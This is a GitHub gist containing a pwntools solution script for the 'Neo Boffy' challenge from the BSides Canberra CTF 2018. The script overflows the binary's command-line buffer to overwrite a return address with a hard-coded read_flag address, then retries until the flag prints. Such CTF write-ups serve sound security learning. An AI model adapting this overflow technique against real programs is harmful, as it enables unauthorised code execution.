Created
July 17, 2018 03:39
-
-
Save ninjaprawn/560f9352db9dc72060749af507d4bca9 to your computer and use it in GitHub Desktop.
Solution to Neo Boffy from the BSides Canberra CTF 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| bin_path = "./neo_boffy" | |
| # Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries | |
| context(log_level="ERROR") | |
| # Can't send NULLs, but can send empty strings | |
| def cmdify(str): return str.split("\x00") | |
| read_flag_offset = 0x8d0 | |
| read_flag = 0x565ee000 + read_flag_offset # Hard code since there is no aslr leak | |
| loop_cap = 0x78 # This is where the loop caps | |
| payload = "" | |
| payload += "\x00" * 3 # ensure we can keep looping | |
| payload += p32(read_flag) | |
| payload += chr(loop_cap - 1 - len(payload)) | |
| payload = payload.rjust(0x79, "A") | |
| # Keep trying until we find it | |
| while True: | |
| p = process([bin_path] + cmdify(payload)) | |
| out = p.recvall() | |
| if "CTF{" in out: | |
| print(out) | |
| break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment